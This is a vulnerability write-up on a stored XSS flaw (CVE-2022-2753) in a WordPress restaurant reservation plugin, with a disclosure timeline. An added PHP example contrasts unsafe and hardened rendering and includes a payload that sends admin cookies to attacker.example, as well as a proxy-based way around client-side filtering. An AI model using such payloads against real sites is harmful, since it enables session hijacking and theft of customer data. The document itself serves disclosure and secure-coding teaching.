Ketchup Restaurant Reservations is a WordPress plugin that provides a restaurant reservation system, where users can make and edit reservations. The admin of the website where the plugin is installed can look at overviews of reservations made. Ketchup Restaurant Reservations version 1.0.0 and earlier contains an Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability.
How the vulnerability works
Let’s have a bite of this snack! How does this vulnerability work? The plugin lets visitors book a reservation for the restaurant. A user just has to visit the public reservation page and fill in the booking form (the original post shows a screenshot of the page here).
The reservation form contains client-side (JavaScript) filtering that rejects user input containing special characters. Because that check runs only in the browser, it can be circumvented by filling in the form with values the code accepts, submitting it, and intercepting the request in a proxy. We then modify the field values in the intercepted POST request and forward it to the website.
When the website receives the request, the POST data is processed and inserted into the database; the plugin's insert code was shown as a screenshot in the original post. That code neither sanitizes nor validates the data before inserting it, so the strings we submit through the form for its variables, PHONE_NUMBER among them, are saved to the database without changes.
(Screenshot in the original post: the Phone Number fields.)
When the bookings page is loaded from the WP admin dashboard, the PHP code fetches all bookings from the database by calling getEverything(), and the variables are then set with the data we submitted (shown as a code screenshot in the original post).
The user input from our malicious booking is then written straight into the HTML of the bookings page, without any escaping, so the browser parses it as markup (also shown as a code screenshot in the original post).
Because the payload runs in the browser of the logged-in administrator who opens the bookings overview, an attacker can for example steal information about customers who made reservations, steal the admin's cookies, or obtain other sensitive data.
Proof of Concept
The vulnerability exists because the reservation form does not sanitize or validate user input server-side, so malicious code can be saved to the database. In addition, the ‘Comment’ field string that is saved in the database is loaded into the webpage without special characters (such as <, >, &, “, and ‘) being converted to HTML entities, so the browser treats the stored string as markup. The injected code is therefore loaded and executed in the admin page where the reservations are listed.
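As an added example (this is not the plugin's code and was not part of the original post), the PHP script below models both mistakes described above: the form handler that trusts a client-side filter and stores the raw POST values, and the admin page that renders the stored strings without escaping. Next to each it shows the hardened form. The booking row, the field names (name, phone, comment), the phone-number pattern and the helper names are constructed assumptions; in a real WordPress plugin the equivalent helpers are sanitize_text_field() on input and esc_html() on output, and htmlspecialchars() is used here only so the script runs with the plain PHP CLI, outside WordPress.

```php
<?php
// Added example, not the plugin's code. Models the stored-XSS flow from the
// advisory: unvalidated input is saved, then rendered unescaped on the admin page.
// Field names, the booking row and the phone pattern are constructed assumptions.

// A constructed booking row, as it would be read back from the database after
// an attacker skipped the JavaScript filter and POSTed raw HTML in two fields.
$maliciousBooking = [
    'name'    => 'Mallory',
    'phone'   => '<img src=x onerror="location=\'https://attacker.example/?c=\'+document.cookie">',
    'comment' => '<script>alert(document.domain)</script>',
];

// Vulnerable pattern: stored strings are concatenated straight into markup, so
// the admin's browser parses the attacker's tags when the bookings page loads.
function renderBookingUnsafe(array $b): string
{
    return "<tr><td>{$b['name']}</td><td>{$b['phone']}</td><td>{$b['comment']}</td></tr>";
}

// Output escaping at the point of output: <, >, &, " and ' become entities, so
// the browser shows the payload as text. WordPress code would call esc_html();
// htmlspecialchars() is the plain-PHP equivalent, used so this runs without WordPress.
function escHtml(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function renderBookingSafe(array $b): string
{
    return '<tr><td>' . escHtml($b['name']) . '</td>'
         . '<td>' . escHtml($b['phone']) . '</td>'
         . '<td>' . escHtml($b['comment']) . '</td></tr>';
}

// Server-side validation at the point of input: the client-side check can be
// bypassed with any HTTP client, so the handler must enforce the format itself.
// Returns the trimmed phone number, or null if the value must be rejected.
function validatePhone(string $raw): ?string
{
    $phone = trim($raw);
    // Assumed format: digits, spaces, +, -, parentheses and dots, 6 to 20 chars.
    if (!preg_match('/^[0-9 +().-]{6,20}$/', $phone)) {
        return null;
    }
    return $phone;
}

// Free-text fields such as the comment cannot be whitelisted the same way, so
// strip tags and control characters on input (WordPress: sanitize_text_field())
// and still escape on output; the two layers are independent defences.
function sanitizeComment(string $raw, int $maxLen = 500): string
{
    $clean = strip_tags($raw);
    $clean = preg_replace('/[\x00-\x1F\x7F]/', '', $clean);
    return mb_substr(trim($clean), 0, $maxLen); // needs the mbstring extension
}

// Demonstration: same stored row, unsafe versus hardened handling.
echo "Unsafe render (payload reaches the browser as markup):\n";
echo renderBookingUnsafe($maliciousBooking), "\n\n";

echo "Safe render (payload is displayed as text):\n";
echo renderBookingSafe($maliciousBooking), "\n\n";

var_dump(validatePhone($maliciousBooking['phone']));  // attacker's phone value
var_dump(validatePhone('+31 (0)20 123-4567'));       // a plausible phone number
var_dump(sanitizeComment($maliciousBooking['comment'])); // attacker's comment value
```

Run it with `php example.php`. The point of keeping both layers is that they fail independently: validation on input stops the malicious row from ever being stored (which also protects any other consumer of the table, such as an export), while escaping on output protects the admin page even from rows that were stored before the fix or that arrive through another path.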
07 August, 2022: WPScan – Vulnerability submitted
10 August, 2022: WPScan – Vendor contacted
29 August, 2022: WPScan – Escalated to WordPress
30 August, 2022: WPScan – Waiting for patch
07 September, 2022: WPScan – No known fix, plugin is closed
07 September, 2022: Disclosure on WPScan and CVE-2022-2753 assigned
20 September, 2022: Proof of Concept disclosure